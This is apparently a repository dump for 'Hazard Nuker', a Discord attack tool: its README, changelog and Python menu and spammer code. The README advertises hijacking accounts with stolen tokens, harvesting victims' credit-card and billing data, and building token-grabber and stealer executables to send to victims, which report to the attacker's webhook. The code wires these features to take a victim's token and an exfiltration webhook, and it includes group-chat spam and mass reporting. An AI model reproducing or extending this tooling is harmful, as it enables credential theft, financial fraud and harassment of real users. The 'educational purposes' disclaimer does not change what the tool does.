README.md
<p align= center</p><a href="https://rdimo.github.io/CheatAway/" target="_blank"><img src="https://cdn.discordapp.com/attachments/853347983639052318/858485202157699092/Hazard_Nuker_Banner.png" alt="HazardNuker"></a>
<p align="center">
<img src="https://img.shields.io/github/languages/top/Rdimo/Hazard-Nuker?style=flat-square" </a>
<img src="https://img.shields.io/github/last-commit/Rdimo/Hazard-Nuker?style=flat-square" </a>
 <img src="https://img.shields.io/github/license/Rdimo/Hazard-Nuker?style=flat-square" </a>
<img src="https://img.shields.io/github/downloads/Rdimo/Hazard-Nuker/total?color=%23daff00&label=v1.3.2 Downloads&style=flat-square" </a>
<img src="https://img.shields.io/github/stars/Rdimo/Hazard-Nuker?color=%23daff00&label=Stars&style=flat-square" </a>
<img src="https://img.shields.io/github/forks/Rdimo/Hazard-Nuker?color=%23daff00&label=Forks&style=flat-square" </a>
</p>
<p align="center">
<a href="https://github.com/Rdimo/Hazard-Nuker#installation">Installation</a> |
<a href="https://github.com/Rdimo/Hazard-Nuker#Important">Important</a> |
<a href="https://github.com/Rdimo/Hazard-Nuker/blob/master/Changelog.md">Changelogs</a> |
<a href="https://rdimo.github.io/CheatAway/">Discord</a>
</p>

#### Hazard Nuker was made by
Love ❌
code ✅

### Features
* ` Many options while being compact`
* ` Auto update`
* ` Easy and fast`
* ` No proxies needed!`
* ` Linux Support!`
* ` Nuke a targetted account`
* ` Unfriend all friends`
* ` DM all friends`
* ` Delete and leave all servers`
* ` Spam Create New servers`
* ` Delete all private DM's`
* ` Spam switch between light/dark and languages`
* ` Get information from a targetted account`
* ` Log into an account thru the token`
* ` Disable Account`
* ` Status Changer`
* ` Create Token/Password/Creditcard Grabber`
* ` Create Qr code that grabs their token upon scanning`
* ` Mass report`
* ` Webhook destroyer`
* ` Groupchat Spammer [NEW]`

<p align="center">
 <img alt="HazardNuker" src="https://cdn.discordapp.com/attachments/895403117301084161/898926072014458960/unknown.png" width="45%">
&nbsp; &nbsp; &nbsp; &nbsp;
 <img alt="HazardNukerUpdate" src="https://cdn.discordapp.com/attachments/853347983639052318/863399932240855060/unknown.png" width="45%">
</p>

#### [1] Nuke a targetted account 
* Spam switch from light to dark mode the whole time nuking
* Delete/leave every server they are in
* Will create 100 servers named whatever you want
* Change language from ja to zh-TW to ko to zh-CN
* Remove all friends
* Send a chosen message to every friend they have
* Everything will be logged and you can watch what happens on the cmd

#### [2] Unfriend all friends
* Removes all friend the user has

#### [3] Delete and leave all servers
* Leaves and deletes all the server the user has

#### [4] Spam Create New servers
* Creates 100 new servers named whatever you want

#### [5] DM Deleter
* Deletes all the private DM's the account has

#### [5] Mass DM
* Messages all friends and group chats a message of your choice 

#### [7] Enable seizure mode
* Switches between Light/dark mode as long as the console is open
* Switches languages from ja to zh-TW to ko to zh-CN

#### [8] Get information from a targetted account
This is the info you get:
* User ID
* Date account was created at
* Language
* Badges
* Avatar URL
* Token
* If they have 2fa on/off
* Email
* Phone number if they have one
* If they have nitro
* If they have nitro you get how many days they have it for 
* Payment type (credit card/paypal)
* If the payment is valid
* Name of the credit card/paypal
* Credit card/Paypal Holder Name
* Credit card brand
* Credit card number (not the whole)
* Credit card expiration date
* Paypal email
* Address 1 and address 2
* Their city
* Their postal code
* Their state
* Their country
* If the payment method is their default
* If they have multiple credit cards connected you get those aswell

#### [9] Log into an account
* Log into the account via their token
* Make sure you have the correct Chromedriver.exe get it [here](https://chromedriver.chromium.org/downloads)
* Download the version corresponding to your chrome browsers version [How to get google version](https://www.businessinsider.com/what-version-of-google-chrome-do-i-have?op=1&r=US&IR=T)

#### [10] Disable Account
* Changes their age to below 13 which is against TOS and leads to their acc to being disabled

#### [11] Status Changer
* Changes their status
* Made this mainly if your lazy like me since you can just log into their account and change their status.

#### [12] Create Token Grabber
Creates a token grabber in exe form that you can send to your victims and get their info through a webhook
Grabs these Things upon running the exe :
* Username
* User id
* Email
* Phone
* Nitro type
* Billing info
* Operating System
* PC username
* Token location
* IP
* Google maps location
* City
* Region
* Local language
* If they have verified email
* If 2fa is enabled
* Creation date
* Their discord token from all their accounts they have
* Their password for discord (you get their password if they update it)
* All of their credit card info (if they put one in)

> Webhook looks like this:

<p align="left"><img src="https://i.imgur.com/bgDXl1F.png"</p>

#### [13] Create Stealer
Upon running the file you will get the following sent to your webhook:
* Username
* Computer Name
* IP
* City
* Region
* Country
* Google Maps Location
* Screenshot of their pc
* All their Valid Discord Tokens
* Password For Discord (You get their password if they update it)
* Their Whole Credit Card (if They put one in)
* All their Chrome Passwords And Cookies
> Webhook looks like this:

<p align="left"><img src="https://i.imgur.com/4KmwB6I.png"</p>

#### [14] QR Code Grabber
* Creates a QR code that will give you a discord user's token if they scan it

#### [15] Mass Report
* Mass report a user of your choice
* The account that will send the reports are the token that you put in

#### [16] Webhook Destroyer
* Choose between deleting or spamming a webhook
* Can customize the duration of spam and the message being sent

#### [17] Exit
* Exit the program
> (press y to confirm exiting)

### ❗・Important
* Make sure to have [Python](https://www.python.org/downloads/) before [Downloading](https://github.com/Rdimo/Hazard-Nuker/archive/refs/heads/master.zip) Hazard
* Also make sure to have python added to [PATH](https://datatofish.com/add-python-to-windows-path/)
* Please Join the [discord server](https://rdimo.github.io/CheatAway/) or contact Rdimo#6969 on discord if you get any sort of major error with Hazard
* Some people have made a version of Hazard Nuker that looks/works like this one just that it's malicious, please make sure you only download stuff from here to make sure your info doesn't get stolen

## Installation 

#### 1st・Installation (source code)
```
git clone https://github.com/Rdimo/Hazard-Nuker.git
cd Hazard-Nuker
start install_requirements.cmd
start run.bat
```

#### 2nd・Installation (compiled)
```
https://github.com/Rdimo/Hazard-Nuker/releases
Download the latest release (Hazard.zip)
Drag it out to desktop and extract it
Open HazardNuker.exe
```

### 🔻・Errors/Fixes

pyinstaller is not recognized as an external command
> open a cmd and type `pip install pyinstaller` or make sure [python](https://www.python.org/downloads/) is added to [PATH](https://datatofish.com/add-python-to-windows-path/)

Errors like these:
<p align="left">
 <img alt="err1" src="https://i.imgur.com/4Zm0AeF.png" width="45%">
&nbsp; &nbsp; &nbsp; &nbsp;
 <img alt="err2"src="https://i.imgur.com/Inm6DV8.png" width="45%">
</p>

> You probably have python 3.10 which has some new shit so downgrade to python 3.9 (https://www.python.org/downloads/release/python-397/)

|🌟Star This Repository if you liked Hazard Nuker!|
|-------------------------------------------------|

<a href="https://rdimo.github.io/CheatAway/" target="_blank"><img src="https://discordapp.com/api/guilds/864857288584724500/widget.png?style=banner2" alt="Cheataway"/></a>

Created by Rdimo#6969 | https://rdimo.github.io/CheatAway
|⚠️・Hazard Nuker was made for educational purposes・⚠️|
|-------------------------------------------------|
By using HazardNuker, you agree that you hold responsibility and accountability of any consequences caused by your actions


Changelog.md
<p align= center</p><a href="https://rdimo.github.io/CheatAway/" target="_blank"><img src="https://cdn.discordapp.com/attachments/853347983639052318/858485202157699092/Hazard_Nuker_Banner.png" alt="HazardNuker"></a>

### 2021-11-04, v1.3.3
* `Added Groupchat Spammer`


### 2021-10-27, v1.3.2
* ` Fixed Mass Report`
* ` For those wondering why my github wasn't visible it was because I got flagged for a while but I'm back now and unflagged!`

### 2021-10-16, v1.3.1
* ` New option! Create Stealer (https://github.com/Rdimo/Hazard-Token-Grabber-V2)`
* ` Should hopefully fully Support Linux Now!`
* ` Auto update now works for both compiled and source code users`
* ` Enabled logs when creating the loggers`
* ` Updated every api to v9`
* ` Fixed bug where seizure mode would go on forever after account nuker`
* ` Fixed bug where the servers wouldn't get deleted/left`

### 2021-9-26, v1.3.0
* ` Eyy source code release as promised`
* ` Fixed some stuff too but don't remember what I fixed`

### 2021-9-22, v1.2.9
* ` Made it so the title changes depending on what your doing now`
* ` Fixed a bug where the title didn't change`
* ` Fixed bug where the qr code grabber would crash`
* ` Fixed token grabber bug, yet again`

### 2021-9-19, v1.2.8
* ` New option! Mass DM, basically just dm's every friend that they have`
* ` Made it show the name instead of the id when removing friends, dms, guild etc except for when using dm spam since that was a pain to fix`
* ` All options runs 100x faster since I abuse threads now`
* ` Hazard runs alot smoother now since I cleaned up the code`
* ` Fixed a bug with the token grabber that it wouldn't install pyinstaller for you`
* ` Fixed a bug were the token grabber wouldn't grab passwords sometimes`

### 2021-9-13, v1.2.7
* ` Fixed a bug with token grabber since I forgot to remove on thing`
* ` Made it more clear when Hazard Nuker fails to update`
* ` Made it more clear on what to do with QR code grabber`

### 2021-9-13, v1.2.6
* ` Fixed a error that you couldn't create token grabber`
* ` Fixed Error Webhook a little`
* ` Made QR code grabber a little bit more clear`

### 2021-9-13, v1.2.5
* ` New option! QR Code grabber! Create a qr code and send it to users to steal their token!`
* ` Made Hazard Nuker send an error to your webhook incase you get one (easier for me to debug and you can send me the errors)`
* ` Disabled logs when logging into an account`
* ` Option 9 is not disable account instead of disable token since disable token got patched (more info https://github.com/Rdimo/Hazard-Nuker#9-disable-account)`
* ` You can now choose if you want to steal password or not`
* ` Just generally improved autoupdate`
* ` Fixed bug where the grabber would crash because it failed to get their language`
* ` Fixed bug with status changer and seizure that you would get an error sometimes`

### 2021-9-2, v1.2.4
* ` Fixed bug where you wouldn't get the password upon people running the token grabber`

### 2021-9-2, v1.2.3
* ` Fixed additional bugs`
* ` Made it check for another module and decreased the logs when creating the token grabber`

### 2021-9-2, v1.2.2
* ` Just fixed a bug were you couldn't create the token/password grabber`

### 2021-9-1, v1.2.1
* ` The token grabber now grabs password and creditcard info! The password will be sent over everytime the user updates the password/email or adds a cc (looks like this now https://imgur.com/bgDXl1F)`
* ` New option! Status changer so you can change their status to whatever you want`
* ` Added so you now see all the badges an account has when using option [7]`
* ` Made option [8] faster and just better working`
* ` Fixed so it now checks properly if you have pyinstaller installed and such`
* ` Fixed the valid webhook checker since it kinda crashed when an invalid webhook url was given`
* ` Fixed webhook spammer a bit, before the input in seconds would always add like +2-3sec`
* ` Fixed so you get the correct avatar url now for the account when using option [7]`
* ` Hazard nuker now downloads a chromedriver for you automatically`

### 2021-07-10, v1.2.0
* ` New option to delete all the private dm channels`
* ` Fixed so seizure mode is active while nuking the account so its even more annoying`
* ` Made it print slow now after almost every option`

### 2021-07-10, v1.1.9
* ` Improved mass report by quite alot:`
* ` Made the title of the cmd change and show how many reports have been sent and the errors`
* ` Better error messages`
* ` Additionally added so you can choose how many reports you wanna send`
* ` Added alot more like reloading if you put wrong report option etc`
* ` Changed the main gui a little bit and made it just more cleaner`
* ` Removed the loading at the start since it was kinda useless`
* ` Made checking for updates a loading bar instead of a slow print`

### 2021-07-09, v1.1.8
* ` Added option to delete webhook and made it as a second choice for choice [11]`
* ` improved token info by alot so now you get nitro info, billing info, avatar url and more small things`

### 2021-07-07, v1.1.7
* ` Fixed seizure mode to work while nuking the account`
* ` Fixed the Log into account actually work now (need correct driver for it)`

### 2021-07-07, v1.1.6
* ` Made auto update work a bit cleaner`
* ` You can now choose what message will be sent to every friend`
* ` You can now choose what the name of the servers will be `

### 2021-06-27, v1.1.5
* ` Added webhook spammer`
* ` Fixed the auto update, put the wrong link in before but now it works`
* ` Made it check for a valid webhook when creating the token grabber`
* ` Made the token grabbers console not popup anymore`

util/gcspammer.py
# Hazard was proudly coded by Rdimo (https://github.com/Rdimo).
# Hazard Nuker under the GNU General Public Liscense v2 (1991).
#GCSpammer created by (https://github.com/RithDev).

import requests
import json
import Hazard
from colorama import Fore

from util.plugins.common import print_slow, getheaders

def GcSpammer(token, recipients):
    json = {
        "recipients": recipients
    }
    for i in range(10): # you change if you want but ratelimits are strict
        try:
            r = requests.post(f'https://discordapp.com/api/v9/users/@me/channels',
            headers=getheaders(token), json=json)
            print(f"{Fore.RED}Created GC"+Fore.RESET)
        except Exception as e:
            print(f"The following error has been encountered and is being ignored: {e}")
    print_slow(f"{Fore.RED}Spammed recipients with groupchats ")
    print("Enter anything to continue. . . ", end="")
    input()
    Hazard.main()

util/plugins/common.py
# Hazard was proudly coded by Rdimo (https://github.com/Rdimo).
# Hazard Nuker under the GNU General Public Liscense v2 (1991).

import os, sys, platform, ctypes
from time import sleep

THIS_VERSION = "1.3.3"


def clear():
    system = platform.system()
    if system == 'Windows':
        os.system('cls')
    elif system == 'Linux':
        os.system('clear')
    else:
        print('\n')*120
    return


def setTitle(str):
    system = platform.system()
    if system == 'Windows':
        ctypes.windll.kernel32.SetConsoleTitleW(f"{str} | Made By Rdimo#6969")
    else:
        os.system(f"\033]0;{str} | Made By Rdimo#6969\a")


def print_slow(str):
    for letter in str:
        sys.stdout.write(letter);sys.stdout.flush();sleep(0.05)


def getheaders(token=None, content_type="application/json"):
    headers = {
        "Content-Type": content_type,
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
    }
    if token:
        headers.update({"Authorization": token})
    return headers

Hazard.py
# Hazard was proudly coded by Rdimo (https://github.com/Rdimo).
# Hazard Nuker under the GNU General Public Liscense v2 (1991).

import requests, threading

from time import sleep
from colorama import Fore, Style, init

# I know you can import the modules alot better but just got so many issues with importing * so just did this instead
from util.plugins.common import clear, setTitle, getheaders, THIS_VERSION
from util.plugins.update import search_for_updates
import util.accountNuke
import util.dmdeleter
import util.gcspammer
import util.info
import util.login
import util.massreport
import util.QR_Grabber
import util.seizure
import util.server_leaver
import util.spamservers
import util.statuschanger
import util.tokendisable
import util.create_token_grabber
import util.create_stealer_V2
import util.unfriender
import util.webhookspammer
import util.massdm
init(convert=True)

def main():
    setTitle(f"Hazard Nuker {THIS_VERSION}")
    global threads
    threads = 0
    clear()
    #Main banner
    banner = Style.BRIGHT + f'''{Fore.LIGHTGREEN_EX}
                                                                                                         _   _
                                                                                                       .-_; ;_-.
                                                                                                      / /     \ \\
                                                                                                     | |       | |
                                                                                                      \ \.---./ /
                                    ██╗  ██╗ █████╗ ███████╗ █████╗ ██████╗ ██████╗               .-"~   .---.   ~"-.
                                    ██║  ██║██╔══██╗╚══███╔╝██╔══██╗██╔══██╗██╔══██╗            ,`.-~/ .'`---`'. \~-.`,
                                    ███████║███████║  ███╔╝ ███████║██████╔╝██║  ██║             '`  | | \ _ / | |   `'
                                    ██╔══██║██╔══██║ ███╔╝  ██╔══██║██╔══██╗██║  ██║           ,     \  \ | | /  /     ,
> Created by Rdimo#6969             ██║  ██║██║  ██║███████╗██║  ██║██║  ██║██████╔╝            ;`'.,_\  `-'-'  /_,.'`;
> https://rdimo.github.io/CheatAway ╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═════╝              '-._  _.-'^'-._  _.-'                                      '''.replace('█', f'{Fore.WHITE}█{Fore.LIGHTGREEN_EX}') + f'''   
{Fore.WHITE}────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────{Fore.RESET}
{Fore.RESET}[{Fore.GREEN}1{Fore.RESET}]{Fore.BLACK} Nuke Account                                |{Fore.RESET}[{Fore.GREEN}10{Fore.RESET}]{Fore.BLACK} Disable Account
{Fore.RESET}[{Fore.GREEN}2{Fore.RESET}]{Fore.BLACK} Unfriend all friends                        |{Fore.RESET}[{Fore.GREEN}11{Fore.RESET}]{Fore.BLACK} Status Changer
{Fore.RESET}[{Fore.GREEN}3{Fore.RESET}]{Fore.BLACK} Delete and leave all servers                |{Fore.RESET}[{Fore.GREEN}12{Fore.RESET}]{Fore.BLACK} Create Token Grabber 
{Fore.RESET}[{Fore.GREEN}4{Fore.RESET}]{Fore.BLACK} Spam Create New servers                     |{Fore.RESET}[{Fore.GREEN}13{Fore.RESET}]{Fore.BLACK} Create Stealer.V2 
{Fore.RESET}[{Fore.GREEN}5{Fore.RESET}]{Fore.BLACK} Dm Deleter                                  |{Fore.RESET}[{Fore.GREEN}14{Fore.RESET}]{Fore.BLACK} QR Code grabber
{Fore.RESET}[{Fore.GREEN}6{Fore.RESET}]{Fore.BLACK} Mass Dm                                     |{Fore.RESET}[{Fore.GREEN}15{Fore.RESET}]{Fore.BLACK} Mass Report
{Fore.RESET}[{Fore.GREEN}7{Fore.RESET}]{Fore.BLACK} Enable Seizure Mode                         |{Fore.RESET}[{Fore.GREEN}16{Fore.RESET}]{Fore.BLACK} Webhook Destroyer
{Fore.RESET}[{Fore.GREEN}8{Fore.RESET}]{Fore.BLACK} Get information from a targetted account    |{Fore.RESET}[{Fore.GREEN}17{Fore.RESET}]{Fore.BLACK} Groupchat Spammer
{Fore.RESET}[{Fore.GREEN}9{Fore.RESET}]{Fore.BLACK} Log into an account                         |{Fore.RESET}[{Fore.GREEN}18{Fore.RESET}]{Fore.RED} Exit
{Fore.WHITE}────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────{Style.RESET_ALL}'''
    print(banner)
    choice = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Choice: {Fore.LIGHTRED_EX}'))
    #all options 
    if choice == '1':
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        Server_Name = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Name of the servers that will be created: {Fore.LIGHTRED_EX}'))
        message_Content = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Message that will be sent to every friend: {Fore.LIGHTRED_EX}'))
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            threads = 100
            if threading.active_count() < threads:
                threading.Thread(target=util.accountNuke.Hazard_Nuke, args=(token, Server_Name, message_Content)).start()
                return
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '2':
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            threads = 100
            if threading.active_count() < threads:
                threading.Thread(target=util.unfriender.UnFriender, args=(token, )).start()
                return
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '3':
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            threads = 100
            if threading.active_count() < threads:
                threading.Thread(target=util.server_leaver.Leaver, args=(token, )).start()
                return
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '4':
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        Server_Name = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Name of the servers that will be created: {Fore.LIGHTRED_EX}'))
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            threads = 100
            if threading.active_count() < threads:
                threading.Thread(target=util.spamservers.SpamServers, args=(token, Server_Name)).start()
                return
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '5':
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            threads = 100
            if threading.active_count() < threads:
                threading.Thread(target=util.dmdeleter.DmDeleter, args=(token, )).start()
                return
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '6':
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        Message = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Message that will be sent to every friend: {Fore.LIGHTRED_EX}'))
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            threads = 100
            if threading.active_count() < threads:
                threading.Thread(target=util.massdm.MassDM, args=(token, Message)).start()
                return
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '7':
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            threads = 100
            if threading.active_count() < threads:
                threading.Thread(target=util.seizure.StartSeizure, args=(token, )).start()
                return
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '8':
        token = str(input(
        f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        util.info.Info(token)

    elif choice == '9':
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            threads = 100
            if threading.active_count() < threads:
                threading.Thread(target=util.login.TokenLogin, args=(token, )).start()
                return                
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '10':
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            util.tokendisable.TokenDisable(token)
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '11':
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        Status = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Custom Status: {Fore.LIGHTRED_EX}'))
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            util.statuschanger.StatusChanger(token, Status)
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '12':
        WebHook = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Webhook Url: {Fore.LIGHTRED_EX}'))
        fileName = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}File name: {Fore.LIGHTRED_EX}'))
        try:
            responce = requests.get(
                WebHook)
            if responce.status_code != 200:
                print("\nInvalid Webhook")
                sleep(1)
                main()
        except Exception as e:
            print(f"an error occured\nignoring: {e}")
            sleep(4)
            main()
        util.create_token_grabber.TokenGrabber(WebHook, fileName)

    elif choice == '13':
        WebHook = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Webhook Url: {Fore.LIGHTRED_EX}'))
        fileName = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}File name: {Fore.LIGHTRED_EX}'))
        try:
            responce = requests.get(
                WebHook)
            if responce.status_code != 200:
                print("\nInvalid Webhook")
                sleep(1)
                main()
        except Exception as e:
            print(f"an error occured\nignoring: {e}")
            sleep(4)
            main()
        util.create_stealer_V2.TokenGrabberV2(WebHook, fileName)

    elif choice == '14':
        WebHook = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Webhook Url: {Fore.LIGHTRED_EX}'))
            
        try:
            responce = requests.get(
                WebHook)
            if responce.status_code != 200:
                print("\nInvalid Webhook")
                sleep(1)
                main()
        except Exception as e:
            print(f"an error occured\nignoring: {e}")
            sleep(4)
            main()
        util.QR_Grabber.QR_Grabber(WebHook)


    elif choice == '15':
        print(f"\n{Fore.LIGHTRED_EX}(the token you input is the account that will send the reports){Fore.RESET}")
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        guild_id1 = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Server ID: {Fore.LIGHTRED_EX}'))
        channel_id1 = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Channel ID: {Fore.LIGHTRED_EX}'))
        message_id1 = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Message ID: {Fore.LIGHTRED_EX}'))
        reason1 = str(input(
            '\n[1] Illegal content\n'
            '[2] Harassment\n'
            '[3] Spam or phishing links\n'
            '[4] Self-harm\n'
            '[5] NSFW content\n\n'

            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Reason: {Fore.LIGHTRED_EX}'))
        if reason1.upper() in ('1', 'ILLEGAL CONTENT'):
            reason1 = 0
        elif reason1.upper() in ('2', 'HARASSMENT'):
            reason1 = 1
        elif reason1.upper() in ('3', 'SPAM OR PHISHING LINKS'):
            reason1 = 2
        elif reason1.upper() in ('4', 'SELF-HARM'):
            reason1 = 3
        elif reason1.upper() in ('5', 'NSFW CONTENT'):
            reason1 = 4
        else:
            print(f"\nInvalid reason")
            sleep(1)
            main()

        r = requests.get('https://discord.com/api/v9/users/@me',headers=getheaders(token))
        if r.status_code == 200:
            clear()
            util.massreport.MassReport(token, guild_id1, channel_id1, message_id1, reason1)
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main()


    elif choice == '16':
        print(f'''
    {Fore.RESET}[{Fore.RED}1{Fore.RESET}] Webhook Deleter
    {Fore.RESET}[{Fore.RED}2{Fore.RESET}] Webhook Spammer    
                        ''')
        secondchoice = int(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Second Choice: {Fore.LIGHTRED_EX}'))

        if secondchoice not in [1, 2]:
            print(f'{Fore.RESET}[{Fore.RED}Error{Fore.RESET}] : Invalid Second Choice')
            sleep(1)
            main()

        if secondchoice == 1:
            WebHook = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Webhook: {Fore.LIGHTRED_EX}'))
            try:
                responce = requests.get(
                    WebHook)
                if responce.status_code != 200:
                    print("\nInvalid Webhook")
                    sleep(1)
                    main()
            except Exception as e:
                print(f"an error occured\nignoring: {e}")
                sleep(4)
                main()

            try:
                requests.delete(WebHook)
                print(f'\n{Fore.GREEN}Webhook Successfully Deleted!{Fore.RESET}\n')
            except Exception as e:
                print(f'{Fore.RED}Error: {Fore.WHITE}{e} {Fore.RED}happened while trying to delete the Webhook')
            choice = str(input(
                f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Enter anything to continue. . . {Fore.LIGHTRED_EX}'))
            main()

        if secondchoice == 2:
            WebHook = str(input(
                f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Webhook: {Fore.LIGHTRED_EX}'))
            Message = str(input(
                f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Message: {Fore.LIGHTRED_EX}'))
            Timer = str(input(
                f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Amount of time for the spam (sec): {Fore.LIGHTRED_EX}'))
            try:
                responce = requests.get(
                    WebHook)
                if responce.status_code != 200:
                    print("\nInvalid Webhook")
                    sleep(1)
                    main()
            except Exception as e:
                print(f"An error occured\nIgnoring: {e}")
                sleep(4)
                main()
            util.webhookspammer.WebhookSpammer(WebHook, Message, Timer)


    elif choice == "17":
        token = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Token: {Fore.LIGHTRED_EX}'))
        recipients = (input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Recipients (separate by ,): {Fore.LIGHTRED_EX}'))
        recipientslist = recipients.split(',')
        if "," not in recipients:
            print(f"\n{Fore.RED}You didn't have any commas (,) format is id,id2,id3")
            sleep(1)
            main()
        r = requests.get(
            'https://discord.com/api/v9/users/@me',
            headers=getheaders(token))
        if r.status_code == 200:
            clear()
            threading.Thread(target=util.gcspammer.GcSpammer, args=(token, recipientslist, )).start()
            return
        else:
            print(f"\n{Fore.RED}Invalid Token.{Fore.RESET}")
            sleep(1)
            main() 




            

    elif choice == '18':
        setTitle("Exiting...")
        choice = str(input(
            f'{Fore.GREEN}[{Fore.CYAN}>>>{Fore.GREEN}] {Fore.RESET}Are you sure you want to exit? (Y to confirm): {Fore.LIGHTRED_EX}'))
        if choice.upper() == 'Y':
            clear()
            Style.RESET_ALL
            Fore.RESET
            exit()
        else:
            main()
    else:
        clear()
        main()

if __name__ == "__main__":
    search_for_updates()
    main()